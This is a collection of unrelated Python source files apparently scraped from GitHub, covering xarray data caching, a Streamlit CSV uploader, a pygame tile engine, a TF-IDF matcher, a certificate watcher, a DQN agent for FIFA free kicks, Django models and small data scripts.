return '.'.join([self.experiment,
ens_str,
self.analysis_name,
self.variable])
def load(self, **kwargs):
'''Load the cached data.'''
# QUESTION: whats the right thing to do if there are no files?
# some datasets might not have some variables
if not self.cache_locations:
return xr.Dataset()
option = kwargs.pop('option',None)
if option not in [None, 'za']:
raise ValueError(f'Unrecognized option: {option}')
if option == 'za' and self.file_format == 'zarr':
raise ValueError(f'File format = zarr is incompatible with za')
ds_list = []
for f in self.cache_locations:
# NOTE: this is probably not the right way to do this
if option == 'za':
f = pop_calc_zonal_mean(f)
ds_list.append(self._open_cached_dataset(f))
return xr.concat(ds_list,
dim='ens',
data_vars=[self.variable])
def _process(self, file_out, data_input):
'''Apply a preprocessing workflow to specified datasets and save a
cached file.'''
# if files_in is a 2D list, merge the files
if isinstance(data_input,list):
year_offset = data_input[0]['year_offset'][0]
dsi = xr.Dataset()
for v, d in zip(self.vars_dependent, data_input):
f = d['files']
dsi = xr.merge((dsi,xr.open_mfdataset(f,
decode_times=False,
decode_coords=False,
data_vars=[v],
chunks={'time':1})))
else: # concat with time
files_input = data_input['files']
year_offset = data_input['year_offset'][0]
dsi = xr.open_mfdataset(files_input,
decode_times=False,
decode_coords=False,
data_vars=[self.variable],
chunks={'time': 1})
tb_name, tb_dim = esmlab.utils.time_bound_var(dsi)
if tb_name and tb_dim:
dso = esmlab.utils.compute_time_var(dsi, tb_name, tb_dim,
year_offset=year_offset)
if self.sel_kwargs:
logging.info(f'Applying sel_kwargs: {self.sel_kwargs}')
dso = dso.sel(**self.sel_kwargs)
if self.isel_kwargs:
logging.info(f'Applying isel_kwargs: {self.isel_kwargs}')
dso = dso.isel(**self.isel_kwargs)
for op in self.operators:
logging.info(f'Applying operator: {op}')
dso = op(dso)
dso = esmlab.utils.uncompute_time_var(dso, tb_name, tb_dim)
self._write_output(dso, file_out)
dsi.close()
def _open_cached_dataset(self,filename):
'''Open a dataset using appropriate method.'''
if self.file_format == 'nc':
ds = xr.open_mfdataset(filename, decode_coords=False,
data_vars=[self.variable],
chunks={'time':1})
elif self.file_format == 'zarr':
ds = xr.open_zarr(filename, decode_coords=False)
#-- fix time?
return ds
def _write_output(self, ds, file_out):
'''Function to write output:
- add file-level attrs
- switch method based on file extension
'''
if not os.path.exists(self.dirout):
logging.info(f'creating {self.dirout}')
os.makedirs(self.dirout)
if os.path.exists(file_out):
logging.info(f'removing old {file_out}')
check_call(['rm','-fr',file_out]) # zarr files are directories
dsattrs = {
'history': f'created by {USER} on {datetime.now().strftime("%Y-%m-%d %H:%M:%S")}',
}
for k,v in self.__dict__.items():
dsattrs[k] = repr(v)
ds.attrs.update(dsattrs)
if self.file_format == 'nc':
logging.info(f'writing {file_out}')
ds.to_netcdf(file_out)
elif self.file_format == 'zarr':
logging.info(f'writing {file_out}')
ds.to_zarr(file_out)
|
NCAR/cmip6_cesm
|
project.py
|
project.py
|
py
| 10,694 |
python
|
en
|
code
| 1 |
github-code
|
6
|
22290772593
|
import streamlit as st
import pandas as pd
st.title("Upload CSV project")
uploaded_csv = st.file_uploader('選擇CSV檔')
if uploaded_csv is not None:
df = pd.read_csv(uploaded_csv,encoding='utf-8')
st.header('CSV檔內容:')
st.dataframe(df)
|
chiangcw0410/mysql_test
|
test/upload.py
|
upload.py
|
py
| 259 |
python
|
en
|
code
| 0 |
github-code
|
6
|
70282380348
|
import src.globe as globe
from src.constants import *
from src.tile import *
class Room:
def __init__(self):
self.areaId = ''
self.roomId = ''
globe.Updater.registerDrawee(self.draw, ['nominal'], [], 'back')
globe.Updater.registerUpdatee(self.update, ['nominal'], ['paused'])
self.tiles = []
self.backgroundTiles = []
self.entities = []
self.hasBackground = False
def populateTiles(self):
rows = self.roomData['data']['tiles']
rCounter = 0
cCounter = 0
for row in rows:
self.tiles.append([])
for tile in row:
tileData = globe.Loader.getTile(tile)
tileX = cCounter*TILE_SIZE
tileY = rCounter*TILE_SIZE
if(tileData['Default']):
t = LevelBlock((tileX, tileY),(rCounter, cCounter), tileData)
else:
t = Tile((tileX, tileY),(rCounter, cCounter), tileData, tileData['data'], False, tileData['animationTime'])
self.tiles[rCounter].append(t)
cCounter += 1
rCounter += 1
cCounter = 0
def populateBackgroundTiles(self):
sets = self.roomData['data']['bgTiles']
rCounter = 0
cCounter = 0
for row in sets:
self.backgroundTiles.append([])
for tile in row:
tileData = globe.Loader.getTile(tile)
tileX = cCounter*TILE_SIZE
tileY = rCounter*TILE_SIZE
newTile = BackgroundTile((rCounter, cCounter),(tileX,tileY),tileData['data'],tileData['animationTime'])
self.backgroundTiles[rCounter].append(newTile)
cCounter += 1
rCounter+=1
cCounter = 0
def load(self, areaId, roomId):
self.areaId = areaId
self.roomId = roomId
self.tiles = []
self.backgroundTiles = []
self.hasBackground = False
for item in self.entities:
item.unRegister()
#globe.Updater.removeEntity(item)
self.entities = []
self.roomData = globe.Loader.getData(self.areaId, 'Rooms', self.roomId)
self.roomData.update(self.roomData['data'])
self.populateTiles()
if('bgTiles' in self.roomData):
if(len(self.roomData['bgTiles'])>0):
self.hasBackground = True
self.populateBackgroundTiles()
globe.Camera.newRoom()
if(self.roomData['doEntities']):
for entity in self.roomData['entities']:
if(not 'posX' in entity):
entity['posX'] = 0
if(not 'posY' in entity):
entity['posY'] = 0
if(not 'action' in entity):
entity['action'] = ''
baby = globe.Loader.getNewEntity(entity['name'])
baby.addData(entity)
baby.register()
baby.spawn((entity['posX'],entity['posY']))
self.entities.append(baby)
#globe.Updater.addEntity(baby)
def update(self, elapsed_time):
if(self.hasBackground):
for row in self.backgroundTiles:
for tile in row:
tile.update(elapsed_time)
for row in self.tiles:
for tile in row:
tile.update(elapsed_time)
def draw(self):
if(self.hasBackground):
for row in self.backgroundTiles:
for tile in row:
tile.draw()
for row in self.tiles:
for tile in row:
tile.draw()
def getHeight(self):
return len(self.tiles)*TILE_SIZE
def getWidth(self):
return len(self.tiles[0])*TILE_SIZE
def getTile(self, tileIndex):
if(tileIndex[0] < 0 or tileIndex[1]<0):
return False
if(tileIndex[1] < len(self.tiles) and tileIndex[0] < len(self.tiles[0])):
return self.tiles[tileIndex[1]][tileIndex[0]]
return False
#returns a subset of tiles around a point, allowing for more efficient collision detection
def getTilesAround(self, pos, TilesAround=2):
xBot = int(TILE_SIZE * round(float(pos[0])/TILE_SIZE) / TILE_SIZE) - 2
xTop = xBot + 5
yBot = int(TILE_SIZE * round(float(pos[1])/TILE_SIZE) / TILE_SIZE) - 2
yTop = yBot + 5
if(xBot < 0):
xBot = 0
if(yBot < 0):
yBot = 0
if(yTop > len(self.tiles)):
yTop = len(self.tiles)
if(yTop < 2):
yTop = 2
if(xTop > len(self.tiles[0])):
xTop = len(self.tiles[0])
if(xTop < 2):
xTop = 2
rets = []
for item in self.tiles[yBot:yTop]:
rets += item[xBot:xTop]
return rets
def getPref(self, pref):
return self.roomData[pref]
def getDisplayName(self):
if(self.getPref('displayName')):
return self.getPref('displayName')
else:
return "Unknown Room"
def getEntities(self):
return self.entities
|
Dieff/pygame_platform_engine
|
src/room.py
|
room.py
|
py
| 5,398 |
python
|
en
|
code
| 1 |
github-code
|
6
|
27581741716
|
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 4 13:56:32 2017
@author: hannu
"""
import numpy as np
import matplotlib.pyplot as plt
import random
import scipy.constants as const
from constants import *
####### Functions for KMC ######
def f(sigma, x):
normal = (1/(2*const.pi*sigma**2))*np.exp(-(x**2)/(2*sigma**2))
return normal
#function to calculate the recombinations
def recombination(vacx,vacy,intx,inty,N,rates,defs):
distvac=distances(vacx,vacy,N)
distint=distances(intx,inty,N)
for i in range(N):
for j in range(N):
#distvac=distances(vacx,vacy,N)
#distint=distances(intx,inty,N)
if(abs((distvac[i]-distint[j]))<=recomb):
vacx[i]=np.NaN
vacy[i]=np.NaN
rates[i]=0
defs=defs-2
intx[j]=np.NaN
inty[j]=np.NaN
rates[j+299]=0
distvac[i]=np.sqrt((vacx[i]**2+vacy[i]**2))
distint[j]=np.sqrt((intx[j]**2+inty[j]**2))
return(defs,vacx,vacy,intx,inty)
#calculates the distance from the origin
def distances(x,y,N):
distances = np.linspace(-70*10**-10,70*10**-10, num=N)
for i in range(N):
distances[i]=np.sqrt(x[i]**2+y[i]**2)
return distances
def cum(rates):
R=[0 for i in range(600)]
for i in range(600):
R[i]=sum(R)+rates[i]
return(R)
|
hpelttari/Kinetic-Monte-Carlo
|
Si_migration/functions.py
|
functions.py
|
py
| 1,456 |
python
|
en
|
code
| 1 |
github-code
|
6
|
32640335090
|
# AUTHOR: Louis Tsiattalou
# DESCRIPTION: Match list items to closest tf-idf match in second list.
import pandas as pd
from tfidf_matcher.ngrams import ngrams
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.neighbors import NearestNeighbors
def matcher(original=[], lookup=[], k_matches=5, ngram_length=3):
"""Takes two lists, returns top `k` matches from `lookup` dataset.
This function does this by:
- Splitting the `lookup` list into ngrams.
- Transforming the resulting ngram list into a TF-IDF Sparse Matrix.
- Fit a NearestNeighbours Model to the matrix using the lookup data.
- Transform the `original` list into a TF-IDF Sparse Matrix.
- Calculates distances to all the `n-matches` nearest neighbours
- Then extract the `original`, `n-matches` closest lookups, and calculate
a match score (abs(1 - Distance to Nearest Neighbour))
:param original: List of strings to generate ngrams from.
:type original: list (of strings), or Pandas Series.
:param lookup: List of strings to match against.
:type lookup: list (of strings), or Pandas Series.
:param k_matches: Number of matches to return.
:type k_matches: int
:param ngram_length: Length of Ngrams returned by `tfidf_matcher.ngrams` callable
:type ngram_length: int
:raises AssertionError: Throws an error if the datatypes in `original` aren't strings.
:raises AssertionError: Throws an error if the datatypes in `lookup` aren't strings.
:raises AssertionError: Throws an error if `k_matches` isn't an integer.
:raises AssertionError: Throws an error if k_matches > len(lookup)
:raises AssertionError: Throws an error if ngram_length isn't an integer
:return: Returns a Pandas dataframe with the `original` list,
`k_matches` columns containing the closest matches from `lookup`,
as well as a Match Score for the closest of these matches.
:rtype: Pandas dataframe
"""
# Assertions
assert all(
[type(x) == type("string") for x in original]
), "Original contains non-str elements!"
assert all(
[type(x) == type("string") for x in lookup]
), "Lookup contains non-str elements!"
assert type(k_matches) == type(0), "k_matches must be an integer"
assert k_matches < len(
lookup
), "k_matches must be shorter than the total length of the lookup list"
assert type(ngram_length) == type(0), "ngram_length must be an integer"
# Enforce listtype, set to lower
original = list(original)
lookup = list(lookup)
original_lower = [x.lower() for x in original]
lookup_lower = [x.lower() for x in lookup]
# Set ngram length for TfidfVectorizer callable
def ngrams_user(string, n=ngram_length):
return ngrams(string, n)
# Generate Sparse TFIDF matrix from Lookup corpus
vectorizer = TfidfVectorizer(min_df=1, analyzer=ngrams_user)
tf_idf_lookup = vectorizer.fit_transform(lookup_lower)
# Fit KNN model to sparse TFIDF matrix generated from Lookup
nbrs = NearestNeighbors(n_neighbors=k_matches, n_jobs=-1, metric="cosine").fit(
tf_idf_lookup
)
# Use nbrs model to obtain nearest matches in lookup dataset. Vectorize first.
tf_idf_original = vectorizer.transform(original_lower)
distances, lookup_indices = nbrs.kneighbors(tf_idf_original)
# Extract top Match Score (which is just the distance to the nearest neighbour),
# Original match item, and Lookup matches.
original_name_list = []
confidence_list = []
index_list = []
lookup_list = []
# i is 0:len(original), j is list of lists of matches
for i, lookup_index in enumerate(lookup_indices):
original_name = original[i]
# lookup names in lookup list
lookups = [lookup[index] for index in lookup_index]
# transform distances to confidences and store
confidence = [1 - round(dist, 2) for dist in distances[i]]
original_name_list.append(original_name)
# store index
index_list.append(lookup_index)
confidence_list.append(confidence)
lookup_list.append(lookups)
# Convert to df
df_orig_name = pd.DataFrame(original_name_list, columns=["Original Name"])
df_lookups = pd.DataFrame(
lookup_list, columns=["Lookup " + str(x + 1) for x in range(0, k_matches)]
)
df_confidence = pd.DataFrame(
confidence_list,
columns=["Lookup " + str(x + 1) + " Confidence" for x in range(0, k_matches)],
)
df_index = pd.DataFrame(
index_list,
columns=["Lookup " + str(x + 1) + " Index" for x in range(0, k_matches)],
)
# bind columns
matches = pd.concat([df_orig_name, df_lookups, df_confidence, df_index], axis=1)
# reorder columns | can be skipped
lookup_cols = list(matches.columns.values)
lookup_cols_reordered = [lookup_cols[0]]
for i in range(1, k_matches + 1):
lookup_cols_reordered.append(lookup_cols[i])
lookup_cols_reordered.append(lookup_cols[i + k_matches])
lookup_cols_reordered.append(lookup_cols[i + 2 * k_matches])
matches = matches[lookup_cols_reordered]
return matches
|
LouisTsiattalou/tfidf_matcher
|
tfidf_matcher/matcher.py
|
matcher.py
|
py
| 5,188 |
python
|
en
|
code
| 41 |
github-code
|
6
|
2296903682
|
# is
user1 = {
"name": "Jean",
"age": 33
}
user2 = {
"name": "Jean",
"age": 33
}
print(user1 == user2)
print(user1 is user1)
print(user1 is user2)
mon_tableau = [3]
print(mon_tableau is mon_tableau)
# Un tableau étant caché derrière une réference, le comportement est un peu différent,
# il faut garder ca en tête.
print([3] is [3])
# is not
print([3] is not [3])
print(True is not False)
var = 4
def plus_three(n):
return n + 3
var = plus_three(var)
print(var)
|
Alikae/PythonFormation
|
05 Operateurs/4_identité.py
|
4_identité.py
|
py
| 493 |
python
|
en
|
code
| 1 |
github-code
|
6
|
23235971280
|
"""
__/\\\\\\\\\\\\______________________/\\\\\\\\\\\____/\\\________/\\\_
_\/\\\////////\\\__________________/\\\/////////\\\_\/\\\_______\/\\\_
_\/\\\______\//\\\________________\//\\\______\///__\/\\\_______\/\\\_
_\/\\\_______\/\\\_____/\\\\\______\////\\\_________\/\\\_______\/\\\_
_\/\\\_______\/\\\___/\\\///\\\_______\////\\\______\/\\\_______\/\\\_
_\/\\\\\\\\\\\\/____\///\\\\\/___\///\\\\\\\\\\\/____\///\\\\\\\\\/___
_\////////////________\/////_______\///////////________\/////////_____
Created by Tomáš Sandrini
"""
from . import __version__
import argparse
import os
import shutil
import sys
from datetime import datetime
from . import handler
from .actions import ValidateMonths, ValidateYears
def get_args(args):
"""
Get the script arguments.
"""
description = "DoSU - pandoc note writing utility"
arg = argparse.ArgumentParser(description=description)
arg.add_argument(
'-M',
metavar='make',
nargs='+',
help="Make (create) given subjects"
)
arg.add_argument(
'-C',
metavar='compile',
nargs='+',
help="Compile notes for a given subjects"
)
arg.add_argument(
'-W',
metavar='write',
help="Start note taking for a subject"
)
arg.add_argument(
'-D',
metavar='delete',
nargs='+',
help="Delete subjects"
)
arg.add_argument(
'-m',
metavar='month',
nargs='+',
action=ValidateMonths,
help="months"
)
arg.add_argument(
'-y',
metavar='year',
nargs='+',
action=ValidateYears,
help="years"
)
arg.add_argument(
'-v',
action='store_true',
help="Print current dosu version"
)
arg.add_argument(
'-l',
action='store_true',
help="List all subjects"
)
arg.add_argument(
'-q',
action='store_true',
help="Quiet mode, don't print anything and \
don't display notifications."
)
return arg.parse_args(args)
def process_args(args):
"""
Process args.
"""
if not len(sys.argv) > 1 and False:
print("error: dosu needs to be given arguments to run.\n"
" Refer to \"dosu -h\" for more info.")
sys.exit(1)
if args.q:
sys.stdout = sys.stderr = open(os.devnull, 'w')
if args.M:
handler.make(args.M)
if args.D:
handler.delete(args.D)
if args.W:
handler.write(args.W)
if args.C:
today = datetime.today()
years = args.y if args.y != None else [today.year]
months = args.m if args.m != None else [today.month]
if args.y:
months = args.m if args.m else [i for i in range(13)][1:]
else:
months = args.m if args.m else [today.month]
handler.compile(subjects=args.C, years=years, months=months)
if args.l:
handler.list()
if args.v:
print("DoSU ", __version__)
sys.exit(0)
def main():
"""
Main script function
"""
args = get_args(sys.argv[1:])
process_args(args)
if __name__ == "__main__":
main()
|
tsandrini/dosu
|
dosu/__main__.py
|
__main__.py
|
py
| 3,242 |
python
|
en
|
code
| 0 |
github-code
|
6
|
5366659164
|
import datetime
import logging
import os.path
import x509
LOG = logging.getLogger(__name__)
class CertWatcher(object):
def __init__(self, key_path, cert_path, common_name, ca_driver,
on_refresh_success=None, on_refresh_failure=None,
refresh_window=None):
if not os.path.isfile(key_path):
raise Exception("key needs to exist")
self.key_path = key_path
self.cert_path = cert_path
self.ca_driver = ca_driver
self.on_refresh_success = on_refresh_success
self.on_refresh_failure = on_refresh_failure
self.common_name = common_name
self.refresh_window = refresh_window
@property
def key(self):
return open(self.key_path).read()
@property
def cert(self):
return open(self.cert_path).read()
def get_expire_date(self):
return x509.get_expire_date(self.cert)
def seconds_until_expiry(self):
diff = self.get_expire_date() - datetime.datetime.now()
return diff.total_seconds()
def _replace_cert(self, cert_contents):
LOG.info("Replacing certificate at %s" % self.cert_path)
cert = open(self.cert_path, "w")
cert.write(cert_contents)
cert.close()
def _will_be_expired(self, date):
return date > self.get_expire_date()
def _expires_in_window(self):
now = datetime.datetime.now()
if not self.refresh_window:
LOG.debug("No refresh window set, assuming expired")
return True
window = now + datetime.timedelta(0, self.refresh_window)
if self._will_be_expired(window):
LOG.info("%s is expired inside window of %s"
% (self.cert_path, self.refresh_window))
return True
LOG.info("Certificate valid within window of %s seconds"
% self.refresh_window)
return False
def _cert_exists(self):
if not os.path.isfile(self.cert_path):
LOG.info("No cert found at %s" % self.cert_path)
return False
return True
def is_invalid_cert(self):
return not self._cert_exists() or self._expires_in_window()
def check_and_update(self):
LOG.info('Checking validity of certificate %s' % self.cert_path)
if self.is_invalid_cert():
csr = x509.generate_csr(self.key, self.common_name)
cert = None
try:
cert = self.ca_driver.sign(csr)
except Exception as e:
LOG.exception("Could not retrieve cert\n%s", e)
if cert:
self._replace_cert(cert)
self.on_refresh_success()
else:
self.on_refresh_failure()
|
takac/cathead
|
cathead/certwatch.py
|
certwatch.py
|
py
| 2,756 |
python
|
en
|
code
| 3 |
github-code
|
6
|
8105270111
|
# coding=utf-8
import click
import MeCab
from transformers import BertJapaneseTokenizer, BertForMaskedLM
@click.command()
@click.option('--text', '-t', default='')
def main(text):
tokenizer = BertJapaneseTokenizer.from_pretrained('bert-base-japanese-whole-word-masking')
tokenized_text = tokenizer.tokenize(text)
print('bert wakatigaki:{}'.format(tokenized_text))
mecab = MeCab.Tagger("-Owakati")
mecab_text = mecab.parse(text)
print('mecab wakatigaki:{}'.format(mecab_text.split()))
if __name__ == '__main__':
main()
|
ys201810/bert_work
|
src/compare_mecab_bert_wakatigaki.py
|
compare_mecab_bert_wakatigaki.py
|
py
| 551 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27614075468
|
# Your BSTIterator will be called like this:
# i, v = BSTIterator(root), []
# while i.hasNext(): v.append(i.next())
from queue import Queue
from queue import LifoQueue
class BSTIterator(object):
def __init__(self, root):
"""
:type root: TreeNode
"""
self.next = None
self.S = LifoQueue()
if root:
self.S.put(root)
def _inorder(self):
if not self.S.empty():
top = self.S.get()
while top.left:
self.S.put(top)
top = top.left
if top.right:
self.S.put(top.right)
return top
def hasNext(self):
"""
:rtype: bool
"""
self.next = self._inorder()
return True if self.next else False
def next(self):
"""
:rtype: int
"""
return self.next.val
# Your BSTIterator will be called like this:
# i, v = BSTIterator(root), []
# while i.hasNext(): v.append(i.next())
|
abhishekvaid/leetcode
|
_1008_bst_iterator.py
|
_1008_bst_iterator.py
|
py
| 1,030 |
python
|
en
|
code
| 0 |
github-code
|
6
|
22084110585
|
# def fact(base):
# return 1 if (n == 1 or n ==0 ) else n * fact(n-1)
# number , n = map(int,input().split())
# qw = (x**fact(n))%10
# print(po)
# import numpy as np
# x , n = map(int,input().split())
# a = np.math.factorial(n)
# if n >=2:
# print(pow(x,a/2,10))
# else:
# print(pow(x,a,10))
# def boost(n,x):
# result = 1
# while x > 0:
# if x %2 == 1:
# result *= ((n**(x-1))*n)
# result *= ((n*n)**(x//2))
# return result
# print(boost(2,2))
# def fast_power(base, power):
# """
# Returns the result of a^b i.e. a**b
# We assume that a >= 1 and b >= 0
# Remember two things!
# - Divide power by 2 and multiply base to itself (if the power is even)
# - Decrement power by 1 to make it even and then follow the first step
# """
# def fast_power(base, power):
# result = 1
# while power > 0:
# if power % 2 == 0:
# power = power // 2
# base = base * base
# else:
# power = power - 1
# result = result * base
# power = power // 2
# base = base * base
# return result
# import numpy as np
# x , n = map(int,input().split())
# mod = np.math.factorial(n)%10
# po = (x**mod)%10
# print(po)
# print(24%10)
number, base = map(int,input().split())
if base == 0 or base == 1:
power = 1
elif base == 2:
power = 2
elif base == 3:
power = 6
elif base == 4:
power = 4
else:
power = 0
print(pow(number,power)%10)
|
vamshipv/code-repo
|
may circuits/fact.py
|
fact.py
|
py
| 1,532 |
python
|
en
|
code
| 0 |
github-code
|
6
|
28151900553
|
import collections
import matplotlib.pyplot as plt
import numpy as np
import os
import cv2
import time
from DQN_RGB import DQN_RGB
from DQN import DQN
from FifaEnv import FifaEnv
from scipy.stats import wilcoxon
from DynamicMLP import MLP
import scipy.misc
from scipy.misc import imresize
# Initialize Global Parameters
DATA_DIR = "Models/"
NUM_ACTIONS = 4 # number of valid actions
MAX_ACTIONS = 6 # If execute MAX_ACTIONS, then it's considered a loop
GAMMA = 0.9 # decay rate of past observations
INITIAL_EPSILON = 1 # starting value of epsilon
FINAL_EPSILON = 0.1 # final value of epsilon
NUM_EPOCHS_OBSERVE = 200
NUM_EPOCHS_TRAIN = 5000
NUM_EPOCHS_TEST = 100
STEPS_TARGET_NETWORK = 1
BATCH_SIZE = 32
NUM_EPOCHS = NUM_EPOCHS_OBSERVE + NUM_EPOCHS_TRAIN
def train_dqn_free_kicks():
game_env = FifaEnv()
dqn = DQN_RGB(NUM_ACTIONS)
#dqn = DQN(NUM_ACTIONS)
dqn.save_model('target_network')
dqn.update_target_network()
num_goals = 0
num_steps = 0
epochs = []
avg_goals = []
epsilon = INITIAL_EPSILON
print('----- STARTING DQN AGENT -----')
for e in range(NUM_EPOCHS):
history_actions = []
game_over = False
goal = 0
loss = 0.0
time.sleep(1.5)
# Verifies if it's an end of the training session (Time is over) or if there's a bug
end_training_session = game_env.check_end_of_episode()
bug = game_env.check_bug()
if end_training_session or bug:
game_env.hard_reset()
while bug:
bug = game_env.check_bug()
# get first state
#frames = collections.deque(maxlen=4)
x_t = game_env.observe_state()
#frames.append(x_t)
#s_t = dqn.preprocess_images(np.array(list(frames)))
s_t = dqn.preprocess_image(x_t)
while not game_over:
# Updates the previous state (previous state = current state)
s_tm1 = s_t
#### Get next action ####
# if len(history_actions) > MAX_ACTIONS, there's a movement loop. So shoot the ball
if len(history_actions) < MAX_ACTIONS:
# Observation action (random)
if e < NUM_EPOCHS_OBSERVE:
a_t = np.random.randint(low=0, high=NUM_ACTIONS, size=1)[0]
# Random or the best current action based on q-value (dqn model)
else:
# Random (exploration)
if np.random.rand() <= epsilon:
a_t = np.random.randint(low=0, high=NUM_ACTIONS, size=1)[0]
# Best action (exploitation)
else:
q = dqn.model.predict(s_t)[0]
a_t = np.argmax(q)
history_actions.append(a_t)
else:
a_t = np.random.randint(low=2, high=NUM_ACTIONS, size=1)[0]
# apply action, get reward
x_t, r_t, game_over = game_env.step(a_t)
#frames.append(x_t)
#s_t = dqn.preprocess_images(np.array(list(frames)))
s_t = dqn.preprocess_image(x_t)
# increment goal if it's a goal
if r_t == 1:
goal += 1
# store experience
dqn.experience.append((s_tm1, a_t, r_t, s_t, game_over))
if e >= NUM_EPOCHS_OBSERVE:
# finished observing, now start training
# get next batch
num_steps += 1
X, Y = dqn.get_next_batch(NUM_ACTIONS, GAMMA, BATCH_SIZE)
#X, Y = dqn.get_next_batch_2(NUM_ACTIONS, GAMMA, BATCH_SIZE)
loss += dqn.model.train_on_batch(X, Y)
if num_steps == STEPS_TARGET_NETWORK and STEPS_TARGET_NETWORK != 1:
num_steps = 0
dqn.update_target_network()
# reduce epsilon gradually
if epsilon > FINAL_EPSILON and e >= NUM_EPOCHS_OBSERVE:
#epsilon = 4 / ((e - NUM_EPOCHS_OBSERVE + 1) ** (1/2))
epsilon -= ((INITIAL_EPSILON - FINAL_EPSILON) / (NUM_EPOCHS_TRAIN / 1.5))
#if e >= NUM_EPOCHS_OBSERVE:
num_goals += goal
epochs.append((e + 1))
avg_goals.append(float(num_goals / (e + 1)))
print("Epoch {:04d}/{:d} | Loss {:.5f} | Epsilon: {:.3f} | Total Goals: {:d} | Epoch Goal: {:d}"
.format(e + 1, NUM_EPOCHS, loss, epsilon, num_goals, goal))
if ((e + 1) % NUM_EPOCHS_OBSERVE == 0 and e >= NUM_EPOCHS_OBSERVE):
dqn.model.save(os.path.join(DATA_DIR, "drl-network-fifa-final.h5"), overwrite=True)
dqn.model.save(os.path.join(DATA_DIR, "drl-network-fifa-final.h5"), overwrite=True)
np.save("epochs.npy",np.array(epochs))
np.save("avg_goals.npy",np.array(avg_goals))
for layer in dqn.model.layers:
print(layer.get_weights())
def test_dqn_free_kicks():
game_env = FifaEnv()
dqn = DQN_RGB(NUM_ACTIONS)
#dqn = DQN(NUM_ACTIONS)
data = []
dqn.load_model("drl-network-fifa-final")
'''for layer in dqn.model.layers:
print(layer.get_weights())'''
num_goals = 0
print('----- TESTING DQN AGENT -----')
time.sleep(3)
for e in range(NUM_EPOCHS_TEST):
history_actions = []
game_over = False
goal = 0
# Verifies if it's an end of the training session (Time is over) or if there's a bug
end_training_session = game_env.check_end_of_episode()
if end_training_session:
game_env.hard_reset()
time.sleep(2)
# get first state
#frames = collections.deque(maxlen=4)
x_t = game_env.observe_state()
#frames.append(x_t)
#s_t = dqn.preprocess_images(np.array(list(frames)))
s_t = dqn.preprocess_image(x_t)
while not game_over:
# Updates the previous state (previous state = current state)
s_tm1 = s_t
#### Get next action ####
# if len(history_actions) > MAX_ACTIONS, there's a movement loop. So shoot the ball
if len(history_actions) < MAX_ACTIONS:
# Random (exploration)
if np.random.rand() <= 0.05:
a_t = np.random.randint(low=0, high=NUM_ACTIONS, size=1)[0]
# Best action (exploitation)
else:
q = dqn.model.predict(s_t)[0]
a_t = np.argmax(q)
history_actions.append(a_t)
else:
a_t = np.random.randint(low=2, high=NUM_ACTIONS, size=1)[0]
# apply action, get reward
x_t, r_t, game_over = game_env.step(a_t)
#frames.append(x_t)
#s_t = dqn.preprocess_images(np.array(list(frames)))
s_t = dqn.preprocess_image(x_t)
# increment goal if it's a goal
if r_t == 1:
goal += 1
time.sleep(2)
num_goals += goal
print("Epoch {:04d}/{:d} | Total Goals: {:d} | Epoch Goal: {:d}"
.format(e + 1, NUM_EPOCHS_TEST, num_goals, goal))
return float(num_goals / NUM_EPOCHS_TEST)
def calculate_avg_goals():
avg_goals = np.load("avg_goals.npy")
epochs = np.load("epochs.npy")
epochs = epochs - NUM_EPOCHS_OBSERVE
print(len(epochs))
plt.plot(epochs[NUM_EPOCHS_OBSERVE:], avg_goals[NUM_EPOCHS_OBSERVE:], color='black')
plt.xlabel('Epochs')
plt.ylabel('Avg Goals')
plt.savefig('training_rmsprop_drl.png')
train_dqn_free_kicks()
test_dqn_free_kicks()
calculate_avg_goals()
|
matheusprandini/FifaFreeKickLearning2019
|
Main.py
|
Main.py
|
py
| 7,635 |
python
|
en
|
code
| 0 |
github-code
|
6
|
5461309461
|
from django.db import models
# Create your models here.
class Category(models.Model):
slug = models.SlugField(max_length=30, primary_key=True)
name = models.CharField(max_length=50)
image = models.ImageField(upload_to='categories', blank=True)
class Meta:
verbose_name = 'Kategorya'
verbose_name_plural = 'Kategorya'
def __str__(self):
return self.name
class Product(models.Model):
title = models.CharField(max_length=100)
description = models.TextField()
price = models.DecimalField(max_digits=10, decimal_places=2)
category= models.ForeignKey(Category, on_delete=models.CASCADE,
related_name='products')
create_at = models.DateTimeField(auto_now_add=True)
image = models.ImageField(upload_to='products', blank=True)
class Meta:
verbose_name = 'Producty'
verbose_name_plural = 'Producty'
def __str__(self):
return f'{self.title} Opisanie: {self.description[0:20]}'
|
izumichiDana/djangoModels
|
main/models.py
|
models.py
|
py
| 1,010 |
python
|
en
|
code
| 0 |
github-code
|
6
|
1277452974
|
"""Default settings."""
import logging
settings = {
'log': {
'level': "debug", # log level
},
'auth': {
'required': False, # set to `True` to enable authentication
'basic_auth': {
'path': '/dev/null', # path to htpasswd file
},
},
'server': {
'port': 1779, # port :-P
},
'staticpath': '/dev/null', # path to static files
'packagepath': '/dev/null', # path to qgis plugins
}
logging.basicConfig(
level=getattr(logging, settings['log']['level'].upper()),
)
|
t4k1t/qgisrv
|
qgisrv/settings.py
|
settings.py
|
py
| 552 |
python
|
en
|
code
| 0 |
github-code
|
6
|
24255720694
|
import pandas as pd
import os
import time
from xlrd import XLRDError
start_time = time.time()
# list of paths to ebay files
ebay_files = []
# searching all excel files in the folder
for root, dirs, files in os.walk(r'D:\Projects\shopContent\ebay'):
ebay_files.extend([os.path.join(root, file) for file in files if file.endswith('.xlsx')])
dirs.clear()
# creating dataframe
ebay_df = pd.DataFrame()
# appending tables from all source ebay files to one dataframe skipping first 2 rows
print("Creating ebay dataframe!")
for file in ebay_files:
try:
ebay_df = ebay_df.append(pd.read_excel(file, sheet_name="Listings", skiprows=2))
except XLRDError:
print(f"No sheet named \'Listings\' in file - {file}")
# create dataframe from csv file
print("Creating shopify dataframe!")
shopify_df = pd.read_csv(r'D:\Projects\shopContent\shopify\shopify.csv', sep=',', encoding="utf-8", header=0)
# replace '||' symbols to ', ' in column 'C:Season'
print("Replacing '||' symbols in ebay dataframe!")
ebay_df['C:Season'] = ebay_df['C:Season'].str.replace("\|\|", ', ')
# enable only 'Custom Label (SKU)', 'C:Brand', 'C:Type', 'C:Season' columns in dataframe
print("Excluding columns in ebay dataframe!")
ebay_df = ebay_df[['Custom Label (SKU)', 'C:Brand', 'C:Type', 'C:Season']]
# export ebay_df and shopify_df to excel files
print("Export ebay and shopify dataframes to xlsx!")
ebay_df.to_excel(r'D:\Projects\shopContent\ebay\ebay.xlsx', index=False, header=True, encoding="utf-8")
